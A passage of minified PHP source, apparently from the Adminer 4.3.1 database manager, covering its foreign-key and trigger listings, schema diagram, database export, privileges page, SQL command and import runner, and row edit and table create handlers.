  8628. echo "<h3 id='foreign-keys'>".'Foreign keys'."</h3>\n";
  8629. $Rc=foreign_keys($a);
  8630. if($Rc) {
  8631. echo "<table id='menustable' border='1' cellspacing='0'>\n","<thead><tr><td>".'Source'."<td>".'Target'."<td>".'ON DELETE'."<td>".'ON UPDATE'."<td>&nbsp;</thead>\n";
  8632. foreach($Rc as $C=>$q) {
  8633. echo "<tr title='".h($C)."'>","<td><i>".implode("</i>, <i>",array_map('h',$q["source"]))."</i>","<td><a href='".h($q["db"]!=""?preg_replace('~db=[^&]*~', "db=".urlencode($q["db"]), ME):($q["ns"]!=""?preg_replace('~ns=[^&]*~', "ns=".urlencode($q["ns"]), ME):ME))."table=".urlencode($q["table"])."'>".($q["db"]!=""?"<b>".h($q["db"])."</b>.":"").($q["ns"]!=""?"<b>".h($q["ns"])."</b>.":"").h($q["table"])."</a>","(<i>".implode("</i>, <i>",array_map('h',$q["target"]))."</i>)","<td>".nbsp($q["on_delete"])."\n","<td>".nbsp($q["on_update"])."\n",'<td><a href="'.h(ME.'foreign='.urlencode($a).'&name='.urlencode($C)).'">'.'Alter'.'</a>';
  8634. }
  8635. echo "</table>\n";
  8636. }
  8637. echo '<p class="links"><a href="'.h(ME).'foreign='.urlencode($a).'">'.'Add foreign key'."</a>\n";
  8638. }
  8639. }
  8640. if(support(is_view($S)?"view_trigger":"trigger")) {
  8641. echo "<h3 id='triggers'>".'Triggers'."</h3>\n";
  8642. $Lh=triggers($a);
  8643. if($Lh) {
  8644. echo "<table id='menustable' cellspacing='0' border='1'>\n";
  8645. foreach($Lh as $y=>$X)
  8646. echo "<tr valign='top'><td>".h($X[0])."<td>".h($X[1])."<td>".h($y)."<td><a href='".h(ME.'trigger='.urlencode($a).'&name='.urlencode($y))."'>".'Alter'."</a>\n";
  8647. echo "</table>\n";
  8648. }
  8649. echo '<p class="links"><a href="'.h(ME).'trigger='.urlencode($a).'">'.'Add trigger'."</a>\n";
  8650. }
  8651. }elseif(isset($_GET["schema"])) {
  8652. page_header('Database schema', "",array(), h(DB.($_GET["ns"]?".$_GET[ns]":"")));
  8653. $fh=array();
  8654. $gh=array();
  8655. $ea=($_GET["schema"]?$_GET["schema"]:$_COOKIE["adminer_schema-".str_replace(".","_",DB)]);
  8656. preg_match_all('~([^:]+):([-0-9.]+)x([-0-9.]+)(_|$)~',$ea,$he, PREG_SET_ORDER);
  8657. foreach($he as $s=>$B) {
  8658. $fh[$B[1]]=array($B[2],$B[3]);
  8659. $gh[]="\n\t'".js_escape($B[1])."': [ $B[2],$B[3] ]";
  8660. }
  8661. $Bh=0;
  8662. $Pa=-1;
  8663. $ug=array();
  8664. $bg=array();
  8665. $Wd=array();
  8666. foreach(table_status('', true) as $R=>$S) {
  8667. if(is_view($S))
  8668. continue;
  8669. $Bf=0;
  8670. $ug[$R]["fields"]=array();
  8671. foreach(fields($R) as $C=>$o) {
  8672. $Bf+=1.25;
  8673. $o["pos"]=$Bf;
  8674. $ug[$R]["fields"][$C]=$o;
  8675. }
  8676. $ug[$R]["pos"]=($fh[$R]?$fh[$R]:array($Bh,0));
  8677. foreach($b->foreignKeys($R) as $X) {
  8678. if(!$X["db"]) {
  8679. $Ud=$Pa;
  8680. if($fh[$R][1]||$fh[$X["table"]][1])
  8681. $Ud=min(floatval($fh[$R][1]), floatval($fh[$X["table"]][1]))-1;
  8682. else
  8683. $Pa-=.1;
  8684. while($Wd[(string) $Ud])
  8685. $Ud-=.0001;
  8686. $ug[$R]["references"][$X["table"]][(string) $Ud]=array($X["source"],$X["target"]);
  8687. $bg[$X["table"]][$R][(string) $Ud]=$X["target"];
  8688. $Wd[(string) $Ud]=true;
  8689. }
  8690. }
  8691. $Bh=max($Bh,$ug[$R]["pos"][0]+2.5+$Bf);
  8692. }
  8693. echo '<div id="schema" style="height: ',$Bh, 'em;" onselectstart="return false;">
  8694. <script type="text/javascript">
  8695. var tablePos = {', implode(",",$gh)."\n",'};
  8696. var em = document.getElementById(\'schema\').offsetHeight / ',$Bh, ';
  8697. document.onmousemove = schemaMousemove;
  8698. document.onmouseup = function (ev) {
  8699. schemaMouseup(ev, \'', js_escape(DB), '\');
  8700. };
  8701. </script>
  8702. ';
  8703. foreach($ug as $C=>$R) {
  8704. echo "<div class='table' style='top: ".$R["pos"][0]."em; left: ".$R["pos"][1]."em;' onmousedown='schemaMousedown(this, event);'>",'<a href="'.h(ME).'table='.urlencode($C).'"><b>'.h($C)."</b></a>";
  8705. foreach($R["fields"] as $o) {
  8706. $X='<span'.type_class($o["type"]).' title="'.h($o["full_type"].($o["null"]?" NULL":'')).'">'.h($o["field"]).'</span>';
  8707. echo "<br>".($o["primary"]?"<i>$X</i>":$X);
  8708. }
  8709. foreach((array) $R["references"] as $mh=>$cg) {
  8710. foreach($cg as $Ud=>$Yf) {
  8711. $Vd=$Ud-$fh[$C][1];
  8712. $s=0;
  8713. foreach($Yf[0] as $Ng)
  8714. echo "\n<div class='references' title='".h($mh)."' id='refs$Ud-".($s++)."' style='left: $Vd"."em; top: ".$R["fields"][$Ng]["pos"]."em; padding-top: .5em;'><div style='border-top: 1px solid Gray; width: ".(-$Vd)."em;'></div></div>";
  8715. }
  8716. }
  8717. foreach((array) $bg[$C] as $mh=>$cg) {
  8718. foreach($cg as $Ud=>$f) {
  8719. $Vd=$Ud-$fh[$C][1];
  8720. $s=0;
  8721. foreach($f as $lh)
  8722. echo "\n<div class='references' title='".h($mh)."' id='refd$Ud-".($s++)."' style='left: $Vd"."em; top: ".$R["fields"][$lh]["pos"]."em; height: 1.25em; background: url(data:image/png;base64,R0lGODlhCAAKAIAAAICAgP///yH5BAEAAAEALAAAAAAIAAoAAAIPBIJplrGLnpQRqtOy3rsAADs=) no-repeat right center;&amp;version=4.3.1'><div style='height: .5em; border-bottom: 1px solid Gray; width: ".(-$Vd)."em;'></div></div>";
  8723. }
  8724. }
  8725. echo "\n</div>\n";
  8726. }
  8727. foreach($ug as $C=>$R) {
  8728. foreach((array) $R["references"] as $mh=>$cg) {
  8729. foreach($cg as $Ud=>$Yf) {
  8730. $we=$Bh;
  8731. $le=-10;
  8732. foreach($Yf[0] as $y=>$Ng) {
  8733. $Cf=$R["pos"][0]+$R["fields"][$Ng]["pos"];
  8734. $Df=$ug[$mh]["pos"][0]+$ug[$mh]["fields"][$Yf[1][$y]]["pos"];
  8735. $we=min($we,$Cf,$Df);
  8736. $le=max($le,$Cf,$Df);
  8737. }
  8738. echo "<div class='references' id='refl$Ud' style='left: $Ud"."em; top: $we"."em; padding: .5em 0;'><div style='border-right: 1px solid Gray; margin-top: 1px; height: ".($le-$we)."em;'></div></div>\n";
  8739. }
  8740. }
  8741. }
  8742. echo '</div>
  8743. <p class="links"><a href="', h(ME."schema=".urlencode($ea)), '" id="schema-link">Permanent link</a>
  8744. ';
  8745. }elseif(isset($_GET["dump"])) {
  8746. $a=$_GET["dump"];
  8747. if($_POST&&!$n) {
  8748. $zb="";
  8749. foreach(array("output","format","db_style","routines","events","table_style","auto_increment","triggers","data_style") as $y)
  8750. $zb.="&$y=".urlencode($_POST[$y]);
  8751. cookie("adminer_export",substr($zb, 1));
  8752. $T=array_flip((array) $_POST["tables"])+array_flip((array) $_POST["data"]);
  8753. $_c=dump_headers((count($T)==1?key($T):DB),(DB==""||count($T)>1));
  8754. $Dd=preg_match('~sql~',$_POST["format"]);
  8755. if($Dd) {
  8756. echo "-- Adminer $ia ".$Wb[DRIVER]." dump\n\n";
  8757. if($x=="sql") {
  8758. echo "SET NAMES utf8;
  8759. SET time_zone = '+00:00';
  8760. ".($_POST["data_style"]?"SET foreign_key_checks = 0;
  8761. SET sql_mode = 'NO_AUTO_VALUE_ON_ZERO';
  8762. ":"")."
  8763. ";
  8764. $g->query("SET time_zone = '+00:00';");
  8765. }
  8766. }
  8767. $Wg=$_POST["db_style"];
  8768. $l=array(DB);
  8769. if(DB=="") {
  8770. $l=$_POST["databases"];
  8771. if(is_string($l))
  8772. $l=explode("\n",rtrim(str_replace("\r","",$l), "\n"));
  8773. }
  8774. foreach((array) $l as $m) {
  8775. $b->dumpDatabase($m);
  8776. if($g->select_db($m)) {
  8777. if($Dd&&preg_match('~CREATE~',$Wg)&&($i=$g->result("SHOW CREATE DATABASE ".idf_escape($m), 1))) {
  8778. set_utf8mb4($i);
  8779. if($Wg=="DROP+CREATE")
  8780. echo "DROP DATABASE IF EXISTS ".idf_escape($m).";\n";
  8781. echo "$i;\n";
  8782. }
  8783. if($Dd) {
  8784. if($Wg)
  8785. echo use_sql($m).";\n\n";
  8786. $kf="";
  8787. if($_POST["routines"]) {
  8788. foreach(array("FUNCTION","PROCEDURE") as $og) {
  8789. foreach(get_rows("SHOW $og STATUS WHERE Db = ".q($m), null, "-- ") as $K) {
  8790. $i=remove_definer($g->result("SHOW CREATE $og ".idf_escape($K["Name"]), 2));
  8791. set_utf8mb4($i);
  8792. $kf.=($Wg!='DROP+CREATE'?"DROP $og IF EXISTS ".idf_escape($K["Name"]).";;\n":"")."$i;;\n\n";
  8793. }
  8794. }
  8795. }
  8796. if($_POST["events"]) {
  8797. foreach(get_rows("SHOW EVENTS",null, "-- ") as $K) {
  8798. $i=remove_definer($g->result("SHOW CREATE EVENT ".idf_escape($K["Name"]), 3));
  8799. set_utf8mb4($i);
  8800. $kf.=($Wg!='DROP+CREATE'?"DROP EVENT IF EXISTS ".idf_escape($K["Name"]).";;\n":"")."$i;;\n\n";
  8801. }
  8802. }
  8803. if($kf)
  8804. echo "DELIMITER ;;\n\n$kf"."DELIMITER ;\n\n";
  8805. }
  8806. if($_POST["table_style"]||$_POST["data_style"]) {
  8807. $li=array();
  8808. foreach(table_status('', true) as $C=>$S) {
  8809. $R=(DB==""||in_array($C, (array) $_POST["tables"]));
  8810. $Eb=(DB==""||in_array($C, (array) $_POST["data"]));
  8811. if($R||$Eb) {
  8812. if($_c=="tar") {
  8813. $zh=new TmpFile;
  8814. ob_start(array($zh,'write'), 1e5);
  8815. }
  8816. $b->dumpTable($C, ($R?$_POST["table_style"]:""),(is_view($S)?2:0));
  8817. if(is_view($S))
  8818. $li[]=$C;
  8819. elseif($Eb) {
  8820. $p=fields($C);
  8821. $b->dumpData($C,$_POST["data_style"], "SELECT *".convert_fields($p,$p)." FROM ".table($C));
  8822. }
  8823. if($Dd&&$_POST["triggers"]&&$R&&($Lh=trigger_sql($C,$_POST["table_style"])))
  8824. echo "\nDELIMITER ;;\n$Lh\nDELIMITER ;\n";
  8825. if($_c=="tar") {
  8826. ob_end_flush();
  8827. tar_file((DB!=""?"":"$m/")."$C.csv",$zh);
  8828. }elseif($Dd)
  8829. echo "\n";
  8830. }
  8831. }
  8832. foreach($li as $ki)
  8833. $b->dumpTable($ki,$_POST["table_style"], 1);
  8834. if($_c=="tar")
  8835. echo pack("x512");
  8836. }
  8837. }
  8838. }
  8839. if($Dd)
  8840. echo "-- ".$g->result("SELECT NOW()")."\n";
  8841. exit;
  8842. }
  8843. page_header('Export',$n, ($_GET["export"]!=""?array("table"=>$_GET["export"]):array()), h(DB));
  8844. echo '<form action="" method="post">
  8845. <table id="menustable" cellspacing="0" border="1">';
  8846. $Hb=array('','USE','DROP+CREATE','CREATE');
  8847. $hh=array('','DROP+CREATE','CREATE');
  8848. $Fb=array('','TRUNCATE+INSERT','INSERT');
  8849. if($x=="sql")
  8850. $Fb[]='INSERT+UPDATE';
  8851. parse_str($_COOKIE["adminer_export"],$K);
  8852. if(!$K)
  8853. $K=array("output"=>"text","format"=>"sql","db_style"=>(DB!=""?"":"CREATE"),"table_style"=>"DROP+CREATE","data_style"=>"INSERT");
  8854. if(!isset($K["events"])) {
  8855. $K["routines"]=$K["events"]=($_GET["dump"]=="");
  8856. $K["triggers"]=$K["table_style"];
  8857. }
  8858. echo "<tr><td>".'Output'."<td>".html_select("output",$b->dumpOutput(),$K["output"], 0)."\n";
  8859. echo "<tr><td>".'Format'."<td>".html_select("format",$b->dumpFormat(),$K["format"], 0)."\n";
  8860. echo ($x=="sqlite"?"":"<tr><td>".'Database'."<td>".html_select('db_style',$Hb,$K["db_style"]).(support("routine")?checkbox("routines",1,$K["routines"], 'Routines'):"").(support("event")?checkbox("events",1,$K["events"], 'Events'):"")), "<tr><td>".'Tables'."<td>".html_select('table_style',$hh,$K["table_style"]).checkbox("auto_increment",1,$K["auto_increment"], 'Auto Increment').(support("trigger")?checkbox("triggers",1,$K["triggers"], 'Triggers'):""), "<tr><td>".'Data'."<td>".html_select('data_style',$Fb,$K["data_style"]), '</table>
  8861. <p><input type="submit" value="Export">
  8862. <input type="hidden" name="token" value="',$Ah, '">
  8863. <table id="menustable" cellspacing="0" border="1">
  8864. ';
  8865. $Gf=array();
  8866. if(DB!="") {
  8867. $cb=($a!=""?"":" checked");
  8868. echo "<thead><tr>","<th style='text-align: left;'><label class='block'><input type='checkbox' id='check-tables'$cb onclick='formCheck(this, /^tables\\[/);'>".'Tables'."</label>","<th style='text-align: right;'><label class='block'>".'Data'."<input type='checkbox' id='check-data'$cb onclick='formCheck(this, /^data\\[/);'></label>","</thead>\n";
  8869. $li="";
  8870. $ih=tables_list();
  8871. foreach($ih as $C=>$U) {
  8872. $Ff=preg_replace('~_.*~','',$C);
  8873. $cb=($a==""||$a==(substr($a, -1)=="%"?"$Ff%":$C));
  8874. $Jf="<tr><td>".checkbox("tables[]",$C,$cb,$C, "checkboxClick(event, this); formUncheck('check-tables');","block");
  8875. if($U!==null&&!preg_match('~table~i',$U))
  8876. $li.="$Jf\n";
  8877. else
  8878. echo "$Jf<td align='right'><label class='block'><span id='Rows-".h($C)."'></span>".checkbox("data[]",$C,$cb, "","checkboxClick(event, this); formUncheck('check-data');")."</label>\n";
  8879. $Gf[$Ff]++;
  8880. }
  8881. echo $li;
  8882. if($ih)
  8883. echo "<script type='text/javascript'>ajaxSetHtml('".js_escape(ME)."script=db');</script>\n";
  8884. }else{
  8885. echo "<thead><tr><th style='text-align: left;'><label class='block'><input type='checkbox' id='check-databases'".($a==""?" checked":"")." onclick='formCheck(this, /^databases\\[/);'>".'Database'."</label></thead>\n";
  8886. $l=$b->databases();
  8887. if($l) {
  8888. foreach($l as $m) {
  8889. if(!information_schema($m)) {
  8890. $Ff=preg_replace('~_.*~','',$m);
  8891. echo "<tr><td>".checkbox("databases[]",$m,$a==""||$a=="$Ff%",$m, "formUncheck('check-databases');","block")."\n";
  8892. $Gf[$Ff]++;
  8893. }
  8894. }
  8895. } else
  8896. echo "<tr><td><textarea name='databases' rows='10' cols='20'></textarea>";
  8897. }
  8898. echo '</table>
  8899. </form>
  8900. ';
  8901. $Kc=true;
  8902. foreach($Gf as $y=>$X) {
  8903. if($y!=""&&$X>1) {
  8904. echo ($Kc?"<p>":" ")."<a href='".h(ME)."dump=".urlencode("$y%")."'>".h($y)."</a>";
  8905. $Kc=false;
  8906. }
  8907. }
  8908. }elseif(isset($_GET["privileges"])) {
  8909. page_header('Privileges');
  8910. echo '<p class="links"><a href="'.h(ME).'user=">'.'Create user'."</a>";
  8911. $I=$g->query("SELECT User, Host FROM mysql.".(DB==""?"user":"db WHERE ".q(DB)." LIKE Db")." ORDER BY Host, User");
  8912. $Yc=$I;
  8913. if(!$I)
  8914. $I=$g->query("SELECT SUBSTRING_INDEX(CURRENT_USER, '@', 1) AS User, SUBSTRING_INDEX(CURRENT_USER, '@', -1) AS Host");
  8915. echo "<form action=''><p>\n";
  8916. hidden_fields_get();
  8917. echo "<input type='hidden' name='db' value='".h(DB)."'>\n",($Yc?"":"<input type='hidden' name='grant' value=''>\n"), "<table id='menustable' cellspacing='0' border='1'>\n","<thead><tr><td>".'Username'."<td>".'Server'."<td>&nbsp;</thead>\n";
  8918. while($K=$I->fetch_assoc())
  8919. echo '<tr'.odd().'><td>'.h($K["User"])."<td>".h($K["Host"]).'<td><a href="'.h(ME.'user='.urlencode($K["User"]).'&host='.urlencode($K["Host"])).'">'.'Edit'."</a>\n";
  8920. if(!$Yc||DB!="")
  8921. echo "<tr".odd()."><td><input type='text' name='user' autocapitalize='off'><td><input type='text' name='host' value='localhost' autocapitalize='off'><td><input type='submit' value='".'Edit'."'>\n";
  8922. echo "</table>\n","</form>\n";
  8923. }elseif(isset($_GET["sql"])) {
  8924. if(!$n&&$_POST["export"]) {
  8925. dump_headers("sql");
  8926. $b->dumpTable("","");
  8927. $b->dumpData("","table",$_POST["query"]);
  8928. exit;
  8929. }
  8930. restart_session();
  8931. $id=&get_session("queries");
  8932. $hd=&$id[DB];
  8933. if(!$n&&$_POST["clear"]) {
  8934. $hd=array();
  8935. redirect(remove_from_uri("history"));
  8936. }
  8937. page_header((isset($_GET["import"])?'Import':'SQL command'),$n);
  8938. if(!$n&&$_POST) {
  8939. $Vc=false;
  8940. if(!isset($_GET["import"]))
  8941. $H=$_POST["query"];
  8942. elseif($_POST["webfile"]) {
  8943. $Vc=@fopen((file_exists("adminer.sql")?"adminer.sql":"compress.zlib://adminer.sql.gz"), "rb");
  8944. $H=($Vc?fread($Vc, 1e6):false);
  8945. } else
  8946. $H=get_file("sql_file",true);
  8947. if(is_string($H)) {
  8948. if(function_exists('memory_get_usage'))
  8949. @ini_set("memory_limit",max(ini_bytes("memory_limit"), 2*strlen($H)+memory_get_usage()+8e6));
  8950. if($H!=""&&strlen($H)<1e6) {
  8951. $Qf=$H.(preg_match("~;[ \t\r\n]*\$~",$H)?"":";");
  8952. if(!$hd||reset(end($hd))!=$Qf) {
  8953. restart_session();
  8954. $hd[]=array($Qf,time());
  8955. set_session("queries",$id);
  8956. stop_session();
  8957. }
  8958. }
  8959. $Og="(?:\\s|/\\*[\s\S]*?\\*/|(?:#|-- )[^\n]*\n?|--\r?\n)";
  8960. $Mb=";";
  8961. $D=0;
  8962. $lc=true;
  8963. $h=connect();
  8964. if(is_object($h)&&DB!="")
  8965. $h->select_db(DB);
  8966. $pb=0;
  8967. $qc=array();
  8968. $pf='[\'"'.($x=="sql"?'`#':($x=="sqlite"?'`[':($x=="mssql"?'[':''))).']|/\\*|-- |$'.($x=="pgsql"?'|\\$[^$]*\\$':'');
  8969. $Ch=microtime(true);
  8970. parse_str($_COOKIE["adminer_export"],$wa);
  8971. $cc=$b->dumpFormat();
  8972. unset($cc["sql"]);
  8973. while($H!="") {
  8974. if(!$D&&preg_match("~^$Og*+DELIMITER\\s+(\\S+)~i",$H,$B)) {
  8975. $Mb=$B[1];
  8976. $H=substr($H, strlen($B[0]));
  8977. }else{
  8978. preg_match('('.preg_quote($Mb)."\\s*|$pf)",$H,$B, PREG_OFFSET_CAPTURE,$D);
  8979. list($Tc,$Bf)=$B[0];
  8980. if(!$Tc&&$Vc&&!feof($Vc))
  8981. $H.=fread($Vc, 1e5);
  8982. else {
  8983. if(!$Tc&&rtrim($H)=="")
  8984. break;
  8985. $D=$Bf+strlen($Tc);
  8986. if($Tc&&rtrim($Tc)!=$Mb) {
  8987. while(preg_match('('.($Tc=='/*'?'\\*/':($Tc=='['?']':(preg_match('~^-- |^#~',$Tc)?"\n":preg_quote($Tc)."|\\\\."))).'|$)s',$H,$B, PREG_OFFSET_CAPTURE,$D)) {
  8988. $sg=$B[0][0];
  8989. if(!$sg&&$Vc&&!feof($Vc))
  8990. $H.=fread($Vc, 1e5);
  8991. else {
  8992. $D=$B[0][1]+strlen($sg);
  8993. if($sg[0]!="\\")
  8994. break;
  8995. }
  8996. }
  8997. }else{
  8998. $lc=false;
  8999. $Qf=substr($H, 0,$Bf);
  9000. $pb++;
  9001. $Jf="<pre id='sql-$pb'><span class='jush-$x'>".$b->sqlCommandQuery($Qf)."</span></pre>\n";
  9002. if($x=="sqlite"&&preg_match("~^$Og*+ATTACH\\b~i",$Qf,$B)) {
  9003. echo $Jf, "<p class='error'>".'ATTACH queries are not supported.'."\n";
  9004. $qc[]=" <a href='#sql-$pb'>$pb</a>";
  9005. if($_POST["error_stops"])
  9006. break;
  9007. }else{
  9008. if(!$_POST["only_errors"]) {
  9009. echo $Jf;
  9010. ob_flush();
  9011. flush();
  9012. }
  9013. $Sg=microtime(true);
  9014. if($g->multi_query($Qf)&&is_object($h)&&preg_match("~^$Og*+USE\\b~i",$Qf))
  9015. $h->query($Qf);
  9016. do {
  9017. $I=$g->store_result();
  9018. $sh=" <span class='time'>(".format_time($Sg).")</span>".(strlen($Qf)<1000?" <a href='".h(ME)."sql=".urlencode(trim($Qf))."'>".'Edit'."</a>":"");
  9019. if($g->error) {
  9020. echo ($_POST["only_errors"]?$Jf:""), "<p class='error'>".'Error in query'.($g->errno?" ($g->errno)":"").": ".error()."\n";
  9021. $qc[]=" <a href='#sql-$pb'>$pb</a>";
  9022. if($_POST["error_stops"])
  9023. break 2;
  9024. }elseif(is_object($I)) {
  9025. $z=$_POST["limit"];
  9026. $df=select($I,$h, array(),$z);
  9027. if(!$_POST["only_errors"]) {
  9028. echo "<form action='' method='post'>\n";
  9029. $Ge=$I->num_rows;
  9030. echo "<p>".($Ge?($z&&$Ge>$z?sprintf('%d / ',$z):"").lang(array('%d row','%d rows'),$Ge):""),$sh;
  9031. $t="export-$pb";
  9032. $zc=",<a href='#$t' onclick=\"return !toggle('$t');\">".'Export'."</a><span id='$t' class='hidden'>: ".html_select("output",$b->dumpOutput(),$wa["output"])." ".html_select("format",$cc,$wa["format"])."<input type='hidden' name='query' value='".h($Qf)."'>"." <input type='submit' name='export' value='".'Export'."'><input type='hidden' name='token' value='$Ah'></span>\n";
  9033. if($h&&preg_match("~^($Og|\\()*+SELECT\\b~i",$Qf)&&($yc=explain($h,$Qf))) {
  9034. $t="explain-$pb";
  9035. echo ",<a href='#$t' onclick=\"return !toggle('$t');\">EXPLAIN</a>$zc","<div id='$t' class='hidden'>\n";
  9036. select($yc,$h,$df);
  9037. echo "</div>\n";
  9038. } else
  9039. echo $zc;
  9040. echo "</form>\n";
  9041. }
  9042. }else{
  9043. if(preg_match("~^$Og*+(CREATE|DROP|ALTER)$Og++(DATABASE|SCHEMA)\\b~i",$Qf)) {
  9044. restart_session();
  9045. set_session("dbs",null);
  9046. stop_session();
  9047. }
  9048. if(!$_POST["only_errors"])
  9049. echo "<p class='message' title='".h($g->info)."'>".lang(array('Query executed OK, %d row affected.','Query executed OK, %d rows affected.'),$g->affected_rows)."$sh\n";
  9050. }
  9051. $Sg=microtime(true);
  9052. } while($g->next_result());
  9053. }
  9054. $H=substr($H,$D);
  9055. $D=0;
  9056. }
  9057. }
  9058. }
  9059. }
  9060. if($lc)
  9061. echo "<p class='message'>".'No commands to execute.'."\n";
  9062. elseif($_POST["only_errors"]) {
  9063. echo "<p class='message'>".lang(array('%d query executed OK.','%d queries executed OK.'),$pb-count($qc)), " <span class='time'>(".format_time($Ch).")</span>\n";
  9064. }elseif($qc&&$pb>1)
  9065. echo "<p class='error'>".'Error in query'.": ".implode("",$qc)."\n";
  9066. } else
  9067. echo "<p class='error'>".upload_error($H)."\n";
  9068. }
  9069. echo '<form action="" method="post" enctype="multipart/form-data" id="form">';
  9070. $vc="<input type='submit' value='".'Execute'."' title='Ctrl+Enter'>";
  9071. if(!isset($_GET["import"])) {
  9072. $Qf=$_GET["sql"];
  9073. if($_POST)
  9074. $Qf=$_POST["query"];
  9075. elseif($_GET["history"]=="all")
  9076. $Qf=$hd;
  9077. elseif($_GET["history"]!="")
  9078. $Qf=$hd[$_GET["history"]][0];
  9079. echo "<p>";
  9080. textarea("query",$Qf, 20);
  9081. echo ($_POST?"":"<script type='text/javascript'>document.getElementsByTagName('textarea')[0].focus();</script>\n"), "<p>$vc\n",'Limit rows'.": <input type='number' name='limit' class='size' value='".h($_POST?$_POST["limit"]:$_GET["limit"])."'>\n";
  9082. }else{
  9083. echo "<fieldset><legend>".'File upload'."</legend><div>",(ini_bool("file_uploads")?"SQL (&lt; ".ini_get("upload_max_filesize")."B): <input type='file' name='sql_file[]' multiple>\n$vc":'File uploads are disabled.'), "</div></fieldset>\n","<fieldset><legend>".'From server'."</legend><div>",sprintf('Webserver file %s', "<span class=cod>adminer.sql".(extension_loaded("zlib")?"[.gz]":"")."</span>"), ' <input type="submit" name="webfile" value="'.'Run file'.'">', "</div></fieldset>\n","<p>";
  9084. }
  9085. echo checkbox("error_stops",1, ($_POST?$_POST["error_stops"]:isset($_GET["import"])), 'Stop on error')."\n",checkbox("only_errors",1, ($_POST?$_POST["only_errors"]:isset($_GET["import"])), 'Show only errors')."\n","<input type='hidden' name='token' value='$Ah'>\n";
  9086. if(!isset($_GET["import"])&&$hd) {
  9087. print_fieldset("history",'History',$_GET["history"]!="");
  9088. for($X=end($hd); $X; $X=prev($hd)) {
  9089. $y=key($hd);
  9090. list($Qf,$sh,$gc)=$X;
  9091. echo '<a href="'.h(ME."sql=&history=$y").'">'.'Edit'."</a>"." <span class='time' title='".@date('Y-m-d',$sh)."'>".@date("H:i:s",$sh)."</span>"." <span class='jush-$x'>".shorten_utf8(ltrim(str_replace("\n"," ",str_replace("\r","",preg_replace('~^(#|-- ).*~m','',$Qf)))), 80, "</span>").($gc?" <span class='time'>($gc)</span>":"")."<br>\n";
  9092. }
  9093. echo "<input type='submit' name='clear' value='".'Clear'."'>\n","<a href='".h(ME."sql=&history=all")."'>".'Edit all'."</a>\n","</div></fieldset>\n";
  9094. }
  9095. echo '</form>';
  9096. }elseif(isset($_GET["edit"])) {
  9097. $a=$_GET["edit"];
  9098. $p=fields($a);
  9099. $Z=(isset($_GET["select"])?(count($_POST["check"])==1?where_check($_POST["check"][0],$p):""):where($_GET,$p));
  9100. $Wh=(isset($_GET["select"])?$_POST["edit"]:$Z);
  9101. foreach($p as $C=>$o) {
  9102. if(!isset($o["privileges"][$Wh?"update":"insert"])||$b->fieldName($o)=="")
  9103. unset($p[$C]);
  9104. }
  9105. if($_POST&&!$n&&!isset($_GET["select"])) {
  9106. $A=$_POST["referer"];
  9107. if($_POST["insert"])
  9108. $A=($Wh?null:$_SERVER["REQUEST_URI"]);
  9109. elseif(!preg_match('~^.+&select=.+$~',$A))
  9110. $A=ME."select=".urlencode($a);
  9111. $w=indexes($a);
  9112. $Rh=unique_array($_GET["where"],$w);
  9113. $Tf="\nWHERE $Z";
  9114. if(isset($_POST["delete"]))
  9115. queries_redirect($A, 'Item has been deleted.',$Vb->delete($a,$Tf, !$Rh));
  9116. else {
  9117. $O=array();
  9118. foreach($p as $C=>$o) {
  9119. $X=process_input($o);
  9120. if($X!==false&&$X!==null)
  9121. $O[idf_escape($C)]=$X;
  9122. }
  9123. if($Wh) {
  9124. if(!$O)
  9125. redirect($A);
  9126. queries_redirect($A, 'Item has been updated.',$Vb->update($a,$O,$Tf, !$Rh));
  9127. if(is_ajax()) {
  9128. page_headers();
  9129. page_messages($n);
  9130. exit;
  9131. }
  9132. }else{
  9133. $I=$Vb->insert($a,$O);
  9134. $Td=($I?last_id():0);
  9135. queries_redirect($A, sprintf('Item%s has been inserted.', ($Td?" $Td":"")),$I);
  9136. }
  9137. }
  9138. }
  9139. $K=null;
  9140. if($_POST["save"])
  9141. $K=(array) $_POST["fields"];
  9142. elseif($Z) {
  9143. $M=array();
  9144. foreach($p as $C=>$o) {
  9145. if(isset($o["privileges"]["select"])) {
  9146. $Fa=convert_field($o);
  9147. if($_POST["clone"]&&$o["auto_increment"])
  9148. $Fa="''";
  9149. if($x=="sql"&&preg_match("~enum|set~",$o["type"]))
  9150. $Fa="1*".idf_escape($C);
  9151. $M[]=($Fa?"$Fa AS ":"").idf_escape($C);
  9152. }
  9153. }
  9154. $K=array();
  9155. if(!support("table"))
  9156. $M=array("*");
  9157. if($M) {
  9158. $I=$Vb->select($a,$M, array($Z),$M, array(),(isset($_GET["select"])?2:1));
  9159. $K=$I->fetch_assoc();
  9160. if(!$K)
  9161. $K=false;
  9162. if(isset($_GET["select"])&&(!$K||$I->fetch_assoc()))
  9163. $K=null;
  9164. }
  9165. }
  9166. if(!support("table")&&!$p) {
  9167. if(!$Z) {
  9168. $I=$Vb->select($a, array("*"),$Z, array("*"));
  9169. $K=($I?$I->fetch_assoc():false);
  9170. if(!$K)
  9171. $K=array($Vb->primary=>"");
  9172. }
  9173. if($K) {
  9174. foreach($K as $y=>$X) {
  9175. if(!$Z)
  9176. $K[$y]=null;
  9177. $p[$y]=array("field"=>$y,"null"=>($y!=$Vb->primary),"auto_increment"=>($y==$Vb->primary));
  9178. }
  9179. }
  9180. }
  9181. edit_form($a,$p,$K,$Wh);
  9182. }elseif(isset($_GET["create"])) {
  9183. $a=$_GET["create"];
  9184. $rf=array();
  9185. foreach(array('HASH','LINEAR HASH','KEY','LINEAR KEY','RANGE','LIST') as $y)
  9186. $rf[$y]=$y;
  9187. $ag=referencable_primary($a);
  9188. $Rc=array();
  9189. foreach($ag as $dh=>$o)
  9190. $Rc[str_replace("`","``",$dh)."`".str_replace("`","``",$o["field"])]=$dh;
  9191. $gf=array();
  9192. $S=array();
  9193. if($a!="") {
  9194. $gf=fields($a);
  9195. $S=table_status($a);
  9196. if(!$S)
  9197. $n='No tables.';
  9198. }
  9199. $K=$_POST;
  9200. $K["fields"]=(array) $K["fields"];
  9201. if($K["auto_increment_col"])
  9202. $K["fields"][$K["auto_increment_col"]]["auto_increment"]=true;
  9203. if($_POST&&!process_fields($K["fields"])&&!$n) {
  9204. if($_POST["drop"])
  9205. queries_redirect(substr(ME, 0, -1), 'Table has been dropped.', drop_tables(array($a)));
  9206. else {
  9207. $p=array();
  9208. $Ca=array();
  9209. $ai=false;
  9210. $Pc=array();
  9211. $ff=reset($gf);
  9212. $_a=" FIRST";
  9213. foreach($K["fields"] as $y=>$o) {
  9214. $q=$Rc[$o["type"]];
  9215. $Mh=($q!==null?$ag[$q]:$o);
  9216. if($o["field"]!="") {
  9217. if(!$o["has_default"])
